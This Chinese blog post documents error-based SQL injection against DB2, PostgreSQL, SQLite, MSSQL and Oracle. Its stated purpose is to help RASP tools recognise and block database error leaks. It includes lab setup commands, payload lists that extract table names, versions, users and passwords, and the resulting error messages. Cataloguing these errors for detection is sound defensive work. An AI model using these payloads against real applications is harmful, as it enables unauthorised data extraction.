数据库报错防护

原创已于 2022-02-08 13:58:09 修改 · 1.6k 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#sql

于 2022-01-13 11:48:46 首次发布

网络安全专栏收录该内容

25 篇文章

订阅专栏

为rasp报错拦截赋能

1.db2

环境搭建

docker run -d -p 50000:50000 --name db2 --privileged=true -e DB2INST1_PASSWORD=123456 -e DBNAME=testdb -e LICENSE=accept ibmcom/db2
docker exec -it db2 bash
su - db2inst1	
db2 connect to testdb
db2 "create table TEST(ID BIGINT NOT NULL GENERATED BY DEFAULT AS IDENTITY (START WITH 1,INCREMENT BY 1),USER_NAME VARCHAR(20),USER_AGES INT)"
# db2 命令后面的sql语句需要用引号括起来，否中会报 -bash: syntax error near unexpected token `(' 错误。

报错

db2 "select tabname, tabschema from syscat.tables where tabschema='SYSTOOLS''";
payload: SYSTOOLS'
# SQL0010N  The string constant beginning with "'SYSTOOLS''" does not have an ending string delimiter.  SQLSTATE=42603

db2 "select tabname, tabschema from syscat.tables where tabschema='SYSTOOLS')--'";
payload: SYSTOOLS')--
# SQL0104N  An unexpected token ")" was found following "tabschema='SYSTOOLS'".  Expected tokens may include:  "END-OF-STATEMENT".  SQLSTATE=42601

2.postgresql

环境搭建

docker pull postgres
docker run --name mypostgres -d -p 5432:5432 -e POSTGRES_PASSWORD=123456 postgres
docker exec -it postgres psql -U postgres -d postgres
psql -U username -h ipaddress -d dbname

数据

create database testDB;
-- ----------------------------
-- Table structure for person
-- ----------------------------
DROP TABLE IF EXISTS "public"."person";
CREATE TABLE "public"."person" (
  "person" int4 NOT NULL,
  "name" varchar(255) COLLATE "pg_catalog"."default",
  "password" varchar(255) COLLATE "pg_catalog"."default"
)
;

-- ----------------------------
-- Records of person
-- ----------------------------
INSERT INTO "public"."person" VALUES (1, 'xjj', '123456');
INSERT INTO "public"."person" VALUES (2, 'xxx', '51234');

-- ----------------------------
-- Table structure for school
-- ----------------------------
DROP TABLE IF EXISTS "public"."school";
CREATE TABLE "public"."school" (
  "id" int4,
  "name" varchar(255) COLLATE "pg_catalog"."default",
  "class" varchar(32) COLLATE "pg_catalog"."default"
)
;

-- ----------------------------
-- Records of school
-- ----------------------------

-- ----------------------------
-- Primary Key structure for table person
-- ----------------------------
ALTER TABLE "public"."person" ADD CONSTRAINT "person_pkey" PRIMARY KEY ("person");

基础语句

# 基础
version()

# 恶意语句
' and 1=cast((SELECT concat('DATABASE: ',current_database())) as int) and '1'='1
' and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and '1'='1
' and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset) as int) and '1'='1
' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1

报错

select * from person where name='xjj' AND 7778=CAST((SELECT version())::text AS double precision); 
# ERROR:  invalid input syntax for type double precision: "PostgreSQL 14.1 (Debian 14.1-1.pgdg110+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 10.2.1-6) 10.2.1 20210110, 64-bit"

3.sqlite

安装sqlite

请访问 SQLite 下载页面，从 Windows 区下载预编译的二进制文件。
下载 sqlite-tools-win32-.zip 和 sqlite-dll-win32-.zip 压缩文件。
创建文件夹 C:\sqlite，并在此文件夹下解压上面两个压缩文件，将得到 sqlite3.def、sqlite3.dll 和 sqlite3.exe 文件。

创建数据

PRAGMA foreign_keys = false;

-- ----------------------------
-- Table structure for person
-- ----------------------------
DROP TABLE IF EXISTS "person";
CREATE TABLE "person" (
  "id" INTEGER NOT NULL,
  "name" TEXT,
  "password" TEXT,
  PRIMARY KEY ("id")
);

-- ----------------------------
-- Records of person
-- ----------------------------
INSERT INTO "person" VALUES (1, 'xjj', ';alkjfsdqw');
INSERT INTO "person" VALUES (2, 'tql', 'tqltql');

-- ----------------------------
-- Table structure for school
-- ----------------------------
DROP TABLE IF EXISTS "school";
CREATE TABLE "school" (
  "id" INTEGER NOT NULL,
  "class" TEXT,
  "schoolname" TEXT,
  PRIMARY KEY ("id")
);

-- ----------------------------
-- Records of school
-- ----------------------------
INSERT INTO "school" VALUES (1, 1, '新东方');
INSERT INTO "school" VALUES (2, 4, NULL);

PRAGMA foreign_keys = true;

基础语句

sqlite_version()
last_insert_rowid()

select * from sqlite_master #查询表结构
select group_concat(name) from sqlite_master where type='table' #读取表名
select group_concat(sql) from sqlite_master where type='table' and name='表名' #读取字段

报错

SELECT * FROM person where name="'"
# no such column: '
SELECT * FROM person where name='''
# nrecognized token: "'''"

generic error, like syntax error、malformed MATCH expression: ["3.6.23.1] and other

4.mssql

mssql在线测试环境

安装和建表

sudo docker run -e "ACCEPT_EULA=Y" -e "SA_PASSWORD=<YourStrong@Passw0rd>" \
   -p 1433:1433 --name sql1 -h sql1 \
   -d \
   mcr.microsoft.com/mssql/server:2017-latest

/opt/mssql-tools/bin/sqlcmd -S 127.0.0.1 -U SA -P password
或者使用navicat连接

# sql语句
# 创建数据库

IF EXISTS (SELECT * FROM sys.all_objects WHERE object_id = OBJECT_ID(N'[dbo].[person]') AND type IN ('U'))
	DROP TABLE [dbo].[person]
GO

CREATE TABLE [dbo].[person] (
  [id] int  NOT NULL,
  [age] int  NULL,
  [name] varchar(255) COLLATE SQL_Latin1_General_CP1_CI_AS  NULL,
  [password] varchar(255) COLLATE SQL_Latin1_General_CP1_CI_AS  NULL
)
GO

ALTER TABLE [dbo].[person] SET (LOCK_ESCALATION = TABLE)
GO


INSERT INTO [dbo].[person] ([id], [age], [name], [password]) VALUES (N'1', N'20', N'xjj', N'EAEAy')
GO


IF EXISTS (SELECT * FROM sys.all_objects WHERE object_id = OBJECT_ID(N'[dbo].[school]') AND type IN ('U'))
	DROP TABLE [dbo].[school]
GO

CREATE TABLE [dbo].[school] (
  [id] int  NULL,
  [class] varchar(255) COLLATE SQL_Latin1_General_CP1_CI_AS  NULL
)
GO

ALTER TABLE [dbo].[school] SET (LOCK_ESCALATION = TABLE)
GO


INSERT INTO [dbo].[school] ([id], [class]) VALUES (N'1', N'1')
GO

INSERT INTO [dbo].[school] ([id], [class]) VALUES (N'2', N'3')
GO


ALTER TABLE [dbo].[person] ADD CONSTRAINT [PK__person__3213E83FFD3AE760] PRIMARY KEY CLUSTERED ([id])
WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON)  
ON [PRIMARY]
GO

基础语句

#基础信息
@@version
@@servername
db_name()
host_name()
col_name()
file_name()
user   #sa dbo public
is_srvrolemember('sysadmin')	#判断是否是系统管理员
is_srvrolemember('db_owner') 	#判断是否是库权限
is_srvrolemember('public') 		#判断是否为public权限
exists(select * from sysobjects) #判断是否存在表

#恶意语句
# for xml path函数主要是用于把多行查询结果变为一行显示，quotename函数的作用是把每行查询结果用[ ]默认包裹起来。
1=(select quotename(table_name) from information_schema.tables for xml path('')) #表名
1=(select quotename(column_name) from information_schema.columns where table_name='person' for xml path('')) #字段
1=(select quotename(name) from testDB.sys.sysobjects where xtype='U' for xml path('')) #所有表名
1=(select quotename(name) from sys.syscolumns where id=(select id from sys.sysobjects where name=('person')) for xml path('')) #查询person表的所有字段
1=(select (file_name((select top 1 name from testDB.sys.sysobjects where xtype='U' and name !='person')))) #第二个表名
1=(cast(host_name() as int))
1=(convert(int,db_name(),111))
1=(select id,':',password from person for xml path(''))
1=(select substring((select id,':',password from person for xml path('')),1,250))

报错注入

select password from dbo.person where id=$_GET[sql]

1.类型转换报错 Msg 245
(1)获取表名
?sql=1 and 1=(select top 1 table_name from information_schema.tables)
报错：
# Msg 245, Level 16, State 1, Server mssql, Line 1
# Conversion failed when converting the nvarchar value 'person' to data type int.

(2)获取版本信息
?sql=1 and 1=(@@version)
# Msg 245, Level 16, State 1, Server mssql, Line 1
# Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2017 (RTM-CU27) (KB5006944) - 14.0.3421.10 (X64) 
# 	Oct 14 2021 00:47:52 
# 	Copyright (C) 2017 Microsoft Corporation
# 	Developer Edition (64-bit) on Linux (Ubuntu 16.04.7 LTS)' to data type int.

(3)获取全部表名
?sql=1 and 1=(select quotename(table_name) from information_schema.tables for xml path(''))
# Msg 245, Level 16, State 1, Server mssql, Line 1
# Conversion failed when converting the nvarchar value '[person][school]' to data type int.

(4)获取第二个表名
?sql=1 and 1=(select (file_name((select (file_name((select top 1 name from testDB.sys.sysobjects where xtype='U' and name !='person'))))))
# Msg 245, Level 16, State 1, Server mssql, Line 1
# Conversion failed when converting the nvarchar value 'school' to data type int.


2.order by报错   Msg 108
?sql=1 order by 5
#Msg 108, Level 16, State 1, Server mssql, Line 1
#The ORDER BY position number 5 is out of range of the number of items in the select list.


3.插入单引号   Msg 105  Msg 102
select password from dbo.person where name='$_GET[sql]'
?sql='
# Msg 105, Level 15, State 1, Server mssql, Procedure , Line 0
# Unclosed quotation mark after the character string '''.
# Msg 102, Level 15, State 1, Server mssql, Procedure , Line 0
# Incorrect syntax near '''.
# [42000] [Microsoft][SQL Server Native Client 10.0][SQL Server]Unclosed quotation mark after the character string '''. (105)
# [42000] [Microsoft][SQL Server Native Client 10.0][SQL Server]Incorrect syntax near '''. (102)

5.oracle

环境

在线oracle网址
 docker搭建oracle

连接

sqlplus /nolog
conn sys/oracle as sysdba

创建数据：

create table t_class(cno varchar2(10) primary key,cname varchar2(20) not null);
create table t_student(
sno varchar2(20) constraint pk_student primary key,
sname varchar2(20) constraint chk_name not null,
sex char(2) constraint chk_sex check (sex in('男', '女')),
birth date,idcard varchar2(10)  references t_class(cno));

insert into t_class values('c001', '2班');
insert into t_class values('c002', '1班');

基础语句

-- 基础信息
select * from all_tables 查询出所有的表
select table_name from user_tables 查询出当前用户的表
select * from all_tab_columns 查询出所有的字段
select column_name from user_tab_columns  查询出当前用户的字段
select * from v$version 查版本
select (SELECT DISTINCT owner FROM all_tables where rownum=1) from dual -- 库名
select table_name from user_tables where rownum=1 -- 表名
select table_name from user_tables where rownum=1 and table_name <> 'xxx' -- 第二个表名

-- 恶意语句
and 1=ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1))
and 1=utl_inaddr.get_host_name((select user from dual))
and 1=ctxsys.drithsx.sn(1,(select user from dual))
and select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null --
and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null --
and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null --
and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null --
and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null --
and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)--

报错注入

select * from t_class where cno='$_GET[sql]'

1.ctxsys.drithsx.sn    DRG-11701
?sql=c001' and 1=ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1)); --
# ORA-20000: Oracle Text error:
# DRG-11701: thesaurus Oracle Database 19c Enterprise Edition Release 19.0.0.0.0 - Production does not exist


2.dbms_utility.sqlid_to_sqlhash    ORA-13797
?sql=c001' and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null -- 
# ORA-13797: invalid SQL Id specified, APEX_PUBLIC_USER


3.utl_inaddr.get_host_name    ORA-29257
?sql=c001' and 1=utl_inaddr.get_host_name((select banner from sys.v_$version where rownum=1)); --
# ORA-29257: host Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit


4.dbms_xdb_version.makeversioned    ORA-31001
?sql=c001' and (select dbms_xdb_version.makeversioned((select banner from sys.v_$version where rownum=1)) from dual) is not null; --
# ORA-31001: Invalid resource handle or path name "Oracle Database 11g Express
# Edition Release 11.2.0.2.0 - 64bit Production"

5.XMLType    ORA-31011
?sql=c001' and (select upper(XMLType(chr(60)||chr(58)||(select banner from sys.v_$version where rownum=1)||chr(62))) from dual) is not null; --
# ORA-31011: XML parsing failed
# ORA-19202: XML 处理
# LPX-00110: Warning: 无效的QName ":SYSTEM"

6.插入单引号
?sql='
# ORA-01756: quoted string not properly terminated


7.注释掉右测括号报错
select * from t_class where cno=('$_GET[sql]')
?sql=abc' and 1=(...) --
# ORA-00907: missing right parenthesis

8.注释掉右双引号，同时插入正确的标识符
select * from t_class where cno=("")
?sql=all_tables --
# ORA-01740: missing double quote in identifier

报错失败

select * from t_class where cno='c001' and ordsys.ord_dicom.getmappingxpath((select banner from sys.v_$version where rownum=1),user,user) is not null;
# ORA-00942: table or view does not exist

其他报错

select * from t_class where cno='c001' order by 5
ORA-01785: ORDER BY item must be the number of a SELECT-list expression

参考：
https://www.freebuf.com/articles/web/291103.html
https://icode9.com/content-2-1047273.html
mssql安装和连接
 mssql查询和报错
https://blog.youkuaiyun.com/weixin_44006354/article/details/103952616
https://www.shuzhiduo.com/A/x9J2EjQEz6/
https://www.runoob.com/postgresql/postgresql-schema.html
https://www.freebuf.com/articles/web/249371.html
https://www.hangge.com/blog/cache/detail_2831.html